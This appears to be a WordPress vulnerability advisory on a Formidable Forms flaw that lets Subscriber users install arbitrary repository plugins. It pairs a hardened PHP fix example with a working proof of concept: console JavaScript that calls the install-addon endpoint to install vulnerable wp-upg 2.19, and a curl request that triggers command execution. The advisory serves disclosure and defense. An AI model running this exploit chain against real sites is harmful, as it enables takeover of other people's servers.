The plugin does not adequately authorize the user or validate the plugin URL in its add-on installation functionality. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins, of arbitrary versions, from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
1. As a Subscriber user, visit `/wp-admin/admin.php?page=formidable-welcome`
2. Run the following JavaScript code in the browser console:

```javascript
var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1');
await fetch( `/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip` );
```

3. Note that version 2.19 of the `wp-upg` plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here.
4. For RCE with the `wp-upg` plugin, run the following `curl` command:

```shell
curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'
```
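The two missing controls the advisory names (authorization and package URL validation) are what a fixed add-on installer has to supply. The following is an added example, not Formidable Forms' code: it registers a route shaped like the `frm-admin/v1/install-addon` endpoint and `file_url` parameter from the advisory, but the callbacks, the `example_` function names and the add-on allow-list are hypothetical. Authorization is tied to the `install_plugins` capability that WordPress itself uses for plugin installs (rather than a token embedded in a link that any logged-in user can read), and the package URL is accepted only if it is an HTTPS URL on `downloads.wordpress.org` naming a slug the plugin actually manages.

```php
<?php
// Added example (hypothetical, not the plugin's own code): a hardened REST route
// for installing add-ons. Route and parameter names mirror the advisory.

// Hypothetical allow-list: only add-ons this plugin ships should be installable here,
// never "any version of any WordPress.org plugin".
const EXAMPLE_ALLOWED_ADDON_SLUGS = array( 'example-addon-one', 'example-addon-two' );

add_action( 'rest_api_init', function () {
    register_rest_route( 'frm-admin/v1', '/install-addon', array(
        'methods'             => 'POST', // state-changing: not GET
        // Authorization: the capability WordPress requires for plugin installs.
        // The advisory's flaw was that a Subscriber could reach this endpoint.
        'permission_callback' => function () {
            if ( ! current_user_can( 'install_plugins' ) ) {
                return new WP_Error( 'rest_forbidden', 'You are not allowed to install plugins.', array( 'status' => 403 ) );
            }
            return true; // the REST API already checks the X-WP-Nonce header for cookie-authenticated calls
        },
        'callback'            => 'example_install_addon',
        'args'                => array(
            'file_url' => array( 'required' => true, 'type' => 'string' ),
        ),
    ) );
} );

// Package URL validation: https, exact host, /plugin/<slug>.<version>.zip path,
// no query/fragment/userinfo, and the slug must be on the allow-list.
function example_validate_addon_url( $url ) {
    if ( ! is_string( $url ) || ! wp_http_validate_url( $url ) ) {
        return false; // wp_http_validate_url also rejects private/loopback hosts
    }
    $parts = wp_parse_url( $url );
    if ( empty( $parts['scheme'] ) || 'https' !== strtolower( $parts['scheme'] ) ) {
        return false;
    }
    if ( empty( $parts['host'] ) || 'downloads.wordpress.org' !== strtolower( $parts['host'] ) ) {
        return false;
    }
    if ( ! empty( $parts['query'] ) || ! empty( $parts['fragment'] ) || ! empty( $parts['user'] ) || ! empty( $parts['port'] ) ) {
        return false;
    }
    if ( empty( $parts['path'] ) || ! preg_match( '#^/plugin/([a-z0-9-]+)\.([0-9]+(?:\.[0-9]+)*)\.zip$#', $parts['path'], $m ) ) {
        return false;
    }
    return in_array( $m[1], EXAMPLE_ALLOWED_ADDON_SLUGS, true );
}

function example_install_addon( WP_REST_Request $request ) {
    $file_url = $request->get_param( 'file_url' );
    if ( ! example_validate_addon_url( $file_url ) ) {
        return new WP_Error( 'invalid_package', 'Package URL is not an allowed add-on.', array( 'status' => 400 ) );
    }

    // Plugin_Upgrader lives in wp-admin; load it and the helpers it depends on.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/misc.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';

    $upgrader = new Plugin_Upgrader( new Automatic_Upgrader_Skin() );
    $result   = $upgrader->install( $file_url ); // true on success, WP_Error/false otherwise
    if ( is_wp_error( $result ) ) {
        return $result;
    }
    if ( true !== $result ) {
        return new WP_Error( 'install_failed', 'Installation failed.', array( 'status' => 500 ) );
    }
    // Installation only; activation is left to a separate, equally authorized step.
    return rest_ensure_response( array( 'installed' => true, 'plugin' => $upgrader->plugin_info() ) );
}
```

With these checks in place, the advisory's proof of concept fails at two independent points: the Subscriber's request is rejected by the permission callback with a 403 before the handler runs, and even an administrator cannot use the endpoint to fetch a package outside the allow-list, so a closed or vulnerable repository plugin such as the one in the advisory cannot be pulled in through this route.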
Alex Sanford
Alex Sanford
Yes
2023-06-05 (about 3 months ago)
2023-06-05 (about 3 months ago)
2023-06-05 (about 3 months ago)